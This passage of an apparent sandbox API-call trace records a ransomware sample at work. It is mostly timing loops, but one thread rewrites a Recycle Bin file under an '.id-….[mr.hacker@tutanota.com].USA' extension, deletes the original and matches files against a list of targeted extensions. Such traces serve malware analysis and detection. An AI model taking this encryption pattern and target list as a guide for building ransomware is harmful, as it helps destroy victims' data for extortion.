GetTickCount () returned 0x1c698 [0051.599] GetTickCount () returned 0x1c698 [0051.599] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x64) returned 0x102 [0051.985] GetTickCount () returned 0x1c81e [0051.986] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x64) returned 0x102 [0052.265] GetTickCount () returned 0x1c937 [0052.265] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x64) returned 0x102 [0052.484] GetTickCount () returned 0x1ca11 [0052.484] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x64) returned 0x102 [0053.153] GetTickCount () returned 0x1ccb0 [0053.153] GetTickCount () returned 0x1ccb0 [0053.153] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x64) returned 0x102 [0053.301] GetTickCount () returned 0x1cd3d [0053.301] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x64) returned 0x102 [0053.554] GetTickCount () returned 0x1ce36 [0053.554] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x64) returned 0x102 [0053.884] GetTickCount () returned 0x1cf8d [0053.885] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x64) returned 0x102 [0054.092] GetTickCount () returned 0x1d058 [0054.092] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x64) returned 0x102 [0054.582] GetTickCount () returned 0x1d23c [0054.582] GetTickCount () returned 0x1d23c [0054.582] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x64) returned 0x102 [0054.806] GetTickCount () returned 0x1d326 [0054.806] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x64) returned 0x102 [0055.062] GetTickCount () returned 0x1d41f [0055.062] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x64) returned 0x102 [0055.738] GetTickCount () returned 0x1d6ce [0055.738] GetTickCount () returned 0x1d6ce [0055.738] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x64) returned 0x102 [0056.337] GetTickCount () returned 0x1d91f [0056.337] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x64) returned 0x102 [0056.594] GetTickCount () returned 0x1da18 [0056.594] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x64) returned 0x102 [0056.839] GetTickCount () returned 0x1db12 [0056.839] GetTickCount () returned 0x1db12 [0056.839] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x64) returned 0x102 [0057.101] GetTickCount () returned 0x1dc1b [0057.101] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x64) returned 0x102 [0057.328] GetTickCount () returned 0x1dcf5 [0057.328] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x64) returned 0x102 [0057.582] GetTickCount () returned 0x1ddff [0057.582] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x64) returned 0x102 [0058.017] GetTickCount () returned 0x1dfb3 [0058.017] GetTickCount () returned 0x1dfb3 [0058.030] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x64) returned 0x102 [0058.218] GetTickCount () returned 0x1e06f [0058.218] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x64) returned 0x102 [0058.632] GetTickCount () returned 0x1e214 [0058.632] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x64) returned 0x102 [0058.789] GetTickCount () returned 0x1e2b0 [0058.789] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x64) returned 0x102 [0059.917] GetTickCount () returned 0x1e713 [0059.917] GetTickCount () returned 0x1e713 [0059.917] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x64) returned 0x102 [0060.222] GetTickCount () returned 0x1e84b [0060.222] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x64) returned 0x102 [0060.629] GetTickCount () returned 0x1e9e1 [0060.629] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x64) returned 0x0 [0060.630] GetTickCount () returned 0x1e9e1 [0060.630] Sleep (dwMilliseconds=0x64) [0060.909] GetTickCount () returned 0x1eafa [0060.909] Sleep (dwMilliseconds=0x64) Thread: id = 9 os_tid = 0x9a0 [0033.088] GetTickCount () returned 0x1841d [0033.088] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x24) returned 0x65e1e0 [0033.088] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x408d90, lpParameter=0x65e1e0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x140 [0033.090] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x408d90, lpParameter=0x65e1e0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x144 [0033.093] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x408d90, lpParameter=0x65e1e0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x148 [0033.095] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x408d90, lpParameter=0x65e1e0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x14c [0033.098] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x10) returned 0x6701a8 [0033.098] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x6701a8, Size=0x20) returned 0x626708 [0033.098] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x10) returned 0x6701a8 [0033.098] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x6701a8, Size=0x20) returned 0x626730 [0033.098] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76c20000 [0033.098] GetProcAddress (hModule=0x76c20000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x76c4d650 [0033.098] Wow64DisableWow64FsRedirection (in: OldValue=0x29aff84 | out: OldValue=0x29aff84*=0x0) returned 1 [0033.098] lstrlenW (lpString="kernel32.dll") returned 12 [0033.098] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x626708 | out: hHeap=0x5d0000) returned 1 [0033.098] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0033.098] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x626730 | out: hHeap=0x5d0000) returned 1 [0033.098] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x4091a0, lpParameter=0x63d448, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x150 [0033.116] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0x64) returned 0x102 [0033.964] GetTickCount () returned 0x18507 [0033.964] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0x64) returned 0x102 [0034.110] GetTickCount () returned 0x18593 [0034.110] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0x64) returned 0x102 [0034.396] GetTickCount () returned 0x1868d [0034.396] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0x64) returned 0x102 [0034.549] GetTickCount () returned 0x18729 [0034.549] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0x64) returned 0x102 [0034.807] GetTickCount () returned 0x18832 [0034.807] GetTickCount () returned 0x18832 [0034.807] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0x64) returned 0x102 [0035.151] GetTickCount () returned 0x1894b [0035.151] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0x64) returned 0x102 [0035.410] GetTickCount () returned 0x18a44 [0035.410] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0x64) returned 0x102 [0035.896] GetTickCount () returned 0x18c37 [0035.896] GetTickCount () returned 0x18c37 [0035.896] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0x64) returned 0x102 [0036.319] GetTickCount () returned 0x18dbd [0036.319] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0x64) returned 0x102 [0036.490] GetTickCount () returned 0x18e69 [0036.490] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0x64) returned 0x102 [0036.704] GetTickCount () returned 0x18f34 [0036.704] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0x64) returned 0x102 [0036.899] GetTickCount () returned 0x18fff [0036.899] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0x64) returned 0x102 [0037.455] GetTickCount () returned 0x19230 [0037.455] GetTickCount () returned 0x19230 [0037.455] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0x64) returned 0x102 [0037.905] GetTickCount () returned 0x193e5 [0037.905] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0x64) returned 0x102 [0038.725] GetTickCount () returned 0x19645 [0038.725] GetTickCount () returned 0x19645 [0038.725] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0x64) returned 0x102 [0039.093] GetTickCount () returned 0x19710 [0039.093] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0x64) returned 0x102 [0039.467] GetTickCount () returned 0x19848 [0039.467] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0x64) returned 0x102 [0039.717] GetTickCount () returned 0x19942 [0039.717] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0x64) returned 0x102 [0040.045] GetTickCount () returned 0x19a89 [0040.046] GetTickCount () returned 0x19a89 [0040.046] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0x64) returned 0x102 [0040.361] GetTickCount () returned 0x19ba2 [0040.361] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0x64) returned 0x102 [0040.835] GetTickCount () returned 0x19d57 [0040.835] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0x64) returned 0x102 [0041.166] GetTickCount () returned 0x19e70 [0041.166] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0x64) returned 0x102 [0041.294] GetTickCount () returned 0x19efc [0041.294] GetTickCount () returned 0x19efc [0041.294] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0x64) returned 0x102 [0041.707] GetTickCount () returned 0x1a092 [0041.707] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0x64) returned 0x102 [0042.019] GetTickCount () returned 0x1a1ca [0042.019] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0x64) returned 0x102 [0042.322] GetTickCount () returned 0x1a2e3 [0042.322] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0x64) returned 0x102 [0042.745] GetTickCount () returned 0x1a497 [0042.760] GetTickCount () returned 0x1a497 [0042.764] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0x64) returned 0x102 [0043.038] GetTickCount () returned 0x1a581 [0043.038] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0x64) returned 0x102 [0043.572] GetTickCount () returned 0x1a7a3 [0043.572] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0x64) returned 0x102 [0043.996] GetTickCount () returned 0x1a949 [0043.996] GetTickCount () returned 0x1a949 [0043.996] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0x64) returned 0x102 [0044.538] GetTickCount () returned 0x1ab6b [0044.538] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0x64) returned 0x102 [0044.987] GetTickCount () returned 0x1ad00 [0044.987] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0x64) returned 0x102 [0045.404] GetTickCount () returned 0x1ae86 [0045.404] GetTickCount () returned 0x1ae86 [0045.404] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0x64) returned 0x102 [0045.531] GetTickCount () returned 0x1af03 [0045.531] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0x64) returned 0x102 [0045.816] GetTickCount () returned 0x1b02b [0045.816] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0x64) returned 0x102 [0046.244] GetTickCount () returned 0x1b1d1 [0046.244] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0x64) returned 0x102 [0046.636] GetTickCount () returned 0x1b357 [0046.636] GetTickCount () returned 0x1b357 [0046.636] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0x64) returned 0x102 [0046.912] GetTickCount () returned 0x1b450 [0046.912] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0x64) returned 0x102 [0047.187] GetTickCount () returned 0x1b559 [0047.187] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0x64) returned 0x102 [0047.343] GetTickCount () returned 0x1b5f5 [0047.343] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0x64) returned 0x102 [0047.599] GetTickCount () returned 0x1b6ff [0047.599] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0x64) returned 0x102 [0048.340] GetTickCount () returned 0x1b9dc [0048.340] GetTickCount () returned 0x1b9dc [0048.340] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0x64) returned 0x102 [0048.824] GetTickCount () returned 0x1bbbf [0048.824] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0x64) returned 0x102 [0049.078] GetTickCount () returned 0x1bcc9 [0049.078] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0x64) returned 0x102 [0049.420] GetTickCount () returned 0x1be20 [0049.420] GetTickCount () returned 0x1be20 [0049.420] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0x64) returned 0x102 [0049.962] GetTickCount () returned 0x1c032 [0049.962] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0x64) returned 0x102 [0050.328] GetTickCount () returned 0x1c1a9 [0050.328] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0x64) returned 0x102 [0050.542] GetTickCount () returned 0x1c273 [0050.542] GetTickCount () returned 0x1c273 [0050.542] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0x64) returned 0x102 [0050.714] GetTickCount () returned 0x1c31f [0050.714] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0x64) returned 0x102 [0050.978] GetTickCount () returned 0x1c428 [0050.978] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0x64) returned 0x102 [0051.599] GetTickCount () returned 0x1c698 [0051.599] GetTickCount () returned 0x1c698 [0051.599] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0x64) returned 0x102 [0051.986] GetTickCount () returned 0x1c81e [0051.986] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0x64) returned 0x102 [0052.265] GetTickCount () returned 0x1c937 [0052.265] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0x64) returned 0x102 [0052.484] GetTickCount () returned 0x1ca11 [0052.484] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0x64) returned 0x102 [0053.153] GetTickCount () returned 0x1ccb0 [0053.153] GetTickCount () returned 0x1ccb0 [0053.153] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0x64) returned 0x102 [0053.301] GetTickCount () returned 0x1cd3d [0053.301] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0x64) returned 0x102 [0053.554] GetTickCount () returned 0x1ce36 [0053.554] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0x64) returned 0x102 [0053.885] GetTickCount () returned 0x1cf8d [0053.885] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0x64) returned 0x102 [0054.092] GetTickCount () returned 0x1d058 [0054.092] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0x64) returned 0x102 [0054.576] GetTickCount () returned 0x1d23c [0054.576] GetTickCount () returned 0x1d23c [0054.576] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0x64) returned 0x102 [0054.806] GetTickCount () returned 0x1d326 [0054.806] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0x64) returned 0x102 [0055.062] GetTickCount () returned 0x1d41f [0055.062] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0x64) returned 0x102 [0055.738] GetTickCount () returned 0x1d6ce [0055.738] GetTickCount () returned 0x1d6ce [0055.738] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0x64) returned 0x102 [0056.337] GetTickCount () returned 0x1d91f [0056.337] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0x64) returned 0x102 [0056.594] GetTickCount () returned 0x1da18 [0056.594] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0x64) returned 0x102 [0056.839] GetTickCount () returned 0x1db12 [0056.839] GetTickCount () returned 0x1db12 [0056.839] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0x64) returned 0x102 [0057.101] GetTickCount () returned 0x1dc1b [0057.101] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0x64) returned 0x102 [0057.328] GetTickCount () returned 0x1dcf5 [0057.328] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0x64) returned 0x102 [0057.582] GetTickCount () returned 0x1ddff [0057.582] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0x64) returned 0x102 [0058.036] GetTickCount () returned 0x1dfc3 [0058.036] GetTickCount () returned 0x1dfc3 [0058.036] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0x64) returned 0x102 [0058.282] GetTickCount () returned 0x1e0bd [0058.282] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0x64) returned 0x102 [0058.663] GetTickCount () returned 0x1e233 [0058.663] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0x64) returned 0x102 [0058.873] GetTickCount () returned 0x1e2fe [0058.873] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0x64) returned 0x102 [0059.917] GetTickCount () returned 0x1e713 [0059.917] GetTickCount () returned 0x1e713 [0059.917] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0x64) returned 0x102 [0060.222] GetTickCount () returned 0x1e84b [0060.222] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0x64) returned 0x102 [0060.630] GetTickCount () returned 0x1e9e1 [0060.630] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0x64) returned 0x0 [0060.630] GetTickCount () returned 0x1e9e1 [0060.630] Sleep (dwMilliseconds=0x64) [0060.909] GetTickCount () returned 0x1eafa [0060.909] Sleep (dwMilliseconds=0x64) Thread: id = 10 os_tid = 0x9a4 [0033.089] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x10000) returned 0x64d468 [0033.089] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x10000) returned 0x65fe88 [0033.089] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x10) returned 0x670130 [0033.089] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x6) returned 0x60a380 [0033.089] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x10) returned 0x6700e8 [0033.089] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x100000) returned 0x3070020 [0033.090] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x10) returned 0x670100 [0033.090] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x670100, Size=0x20) returned 0x626708 [0033.090] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x10) returned 0x670100 [0033.090] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x670100, Size=0x20) returned 0x626730 [0033.090] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76c20000 [0033.090] GetProcAddress (hModule=0x76c20000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x76c4d650 [0033.090] Wow64DisableWow64FsRedirection (in: OldValue=0x2aaff58 | out: OldValue=0x2aaff58*=0x0) returned 1 [0033.090] lstrlenW (lpString="kernel32.dll") returned 12 [0033.090] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x626708 | out: hHeap=0x5d0000) returned 1 [0033.090] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0033.090] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x626730 | out: hHeap=0x5d0000) returned 1 [0033.090] Sleep (dwMilliseconds=0x64) [0033.931] lstrcmpiW (lpString1=".ini", lpString2=".USA") returned -1 [0033.931] lstrlenW (lpString="desktop.ini") returned 11 [0033.931] CreateFileW (lpFileName="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini" (normalized: "c:\\$recycle.bin\\s-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x168 [0033.931] GetFileSizeEx (in: hFile=0x168, lpFileSize=0x2aaff1c | out: lpFileSize=0x2aaff1c*=129) returned 1 [0033.931] CloseHandle (hObject=0x168) returned 1 [0033.931] GetFileAttributesW (lpFileName="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini" (normalized: "c:\\$recycle.bin\\s-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini")) returned 0x26 [0033.931] GetFileAttributesW (lpFileName="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\$recycle.bin\\s-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0033.931] CreateFileW (lpFileName="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini" (normalized: "c:\\$recycle.bin\\s-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x168 [0033.931] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0033.931] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0033.931] CreateFileW (lpFileName="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\$recycle.bin\\s-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x16c [0033.932] GetLastError () returned 0x0 [0033.932] ReadFile (in: hFile=0x168, lpBuffer=0x3070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2aafed4*=0x81, lpOverlapped=0x0) returned 1 [0033.945] WriteFile (in: hFile=0x16c, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2aafc9c*=0x90, lpOverlapped=0x0) returned 1 [0033.946] ReadFile (in: hFile=0x168, lpBuffer=0x3070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2aafed4*=0x0, lpOverlapped=0x0) returned 1 [0033.946] WriteFile (in: hFile=0x16c, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2aafc9c*=0xea, lpOverlapped=0x0) returned 1 [0033.946] SetEndOfFile (hFile=0x16c) returned 1 [0033.946] CloseHandle (hObject=0x16c) returned 1 [0033.947] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0033.947] SetEndOfFile (hFile=0x168) returned 1 [0033.948] CloseHandle (hObject=0x168) returned 1 [0033.948] SetFileAttributesW (lpFileName="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x26) returned 1 [0033.948] DeleteFileW (lpFileName="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini" (normalized: "c:\\$recycle.bin\\s-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini")) returned 1 [0033.948] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini") returned 74 [0033.948] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini") returned 74 [0033.948] lstrlenW (lpString=".doc") returned 4 [0033.948] lstrcmpiW (lpString1=".doc", lpString2=".ini") returned -1 [0033.948] lstrlenW (lpString=".docx") returned 5 [0033.948] lstrcmpiW (lpString1=".docx", lpString2="p.ini") returned -1 [0033.948] lstrlenW (lpString=".pdf") returned 4 [0033.948] lstrcmpiW (lpString1=".pdf", lpString2=".ini") returned 1 [0033.948] lstrlenW (lpString=".xls") returned 4 [0033.948] lstrcmpiW (lpString1=".xls", lpString2=".ini") returned 1 [0033.948] lstrlenW (lpString=".xlsx") returned 5 [0033.949] lstrcmpiW (lpString1=".xlsx", lpString2="p.ini") returned -1 [0033.949] lstrlenW (lpString=".ppt") returned 4 [0033.949] lstrcmpiW (lpString1=".ppt", lpString2=".ini") returned 1 [0033.949] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini") returned 74 [0033.949] lstrlenW (lpString=".zip") returned 4 [0033.949] lstrcmpiW (lpString1=".zip", lpString2=".ini") returned 1 [0033.949] lstrlenW (lpString=".rar") returned 4 [0033.949] lstrcmpiW (lpString1=".rar", lpString2=".ini") returned 1 [0033.949] lstrlenW (lpString=".bz2") returned 4 [0033.949] lstrcmpiW (lpString1=".bz2", lpString2=".ini") returned -1 [0033.949] lstrlenW (lpString=".7z") returned 3 [0033.949] lstrcmpiW (lpString1=".7z", lpString2="ini") returned -1 [0033.949] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini") returned 74 [0033.949] lstrlenW (lpString=".dbf") returned 4 [0033.949] lstrcmpiW (lpString1=".dbf", lpString2=".ini") returned -1 [0033.949] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini") returned 74 [0033.949] lstrlenW (lpString=".1cd") returned 4 [0033.949] lstrcmpiW (lpString1=".1cd", lpString2=".ini") returned -1 [0033.949] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini") returned 74 [0033.949] lstrlenW (lpString=".jpg") returned 4 [0033.949] lstrcmpiW (lpString1=".jpg", lpString2=".ini") returned 1 [0033.949] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini") returned 74 [0033.949] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini") returned 74 [0033.949] lstrlenW (lpString=".doc") returned 4 [0033.949] lstrcmpiW (lpString1=".doc", lpString2=".ini") returned -1 [0033.949] lstrlenW (lpString=".docx") returned 5 [0033.949] lstrcmpiW (lpString1=".docx", lpString2="p.ini") returned -1 [0033.949] lstrlenW (lpString=".pdf") returned 4 [0033.949] lstrcmpiW (lpString1=".pdf", lpString2=".ini") returned 1 [0033.949] lstrlenW (lpString=".xls") returned 4 [0033.949] lstrcmpiW (lpString1=".xls", lpString2=".ini") returned 1 [0033.949] lstrlenW (lpString=".xlsx") returned 5 [0033.949] lstrcmpiW (lpString1=".xlsx", lpString2="p.ini") returned -1 [0033.949] lstrlenW (lpString=".ppt") returned 4 [0033.950] lstrcmpiW (lpString1=".ppt", lpString2=".ini") returned 1 [0033.950] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini") returned 74 [0033.950] lstrlenW (lpString=".zip") returned 4 [0033.950] lstrcmpiW (lpString1=".zip", lpString2=".ini") returned 1 [0033.950] lstrlenW (lpString=".rar") returned 4 [0033.950] lstrcmpiW (lpString1=".rar", lpString2=".ini") returned 1 [0033.950] lstrlenW (lpString=".bz2") returned 4 [0033.950] lstrcmpiW (lpString1=".bz2", lpString2=".ini") returned -1 [0033.950] lstrlenW (lpString=".7z") returned 3 [0033.950] lstrcmpiW (lpString1=".7z", lpString2="ini") returned -1 [0033.950] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini") returned 74 [0033.950] lstrlenW (lpString=".dbf") returned 4 [0033.950] lstrcmpiW (lpString1=".dbf", lpString2=".ini") returned -1 [0033.950] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini") returned 74 [0033.950] lstrlenW (lpString=".1cd") returned 4 [0033.950] lstrcmpiW (lpString1=".1cd", lpString2=".ini") returned -1 [0033.950] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini") returned 74 [0033.950] lstrlenW (lpString=".jpg") returned 4 [0033.950] lstrcmpiW (lpString1=".jpg", lpString2=".ini") returned 1 [0033.950] lstrcmpiW (lpString1=".LOG", lpString2=".USA") returned -1 [0033.950] lstrlenW (lpString="BCD.LOG") returned 7 [0033.950] CreateFileW 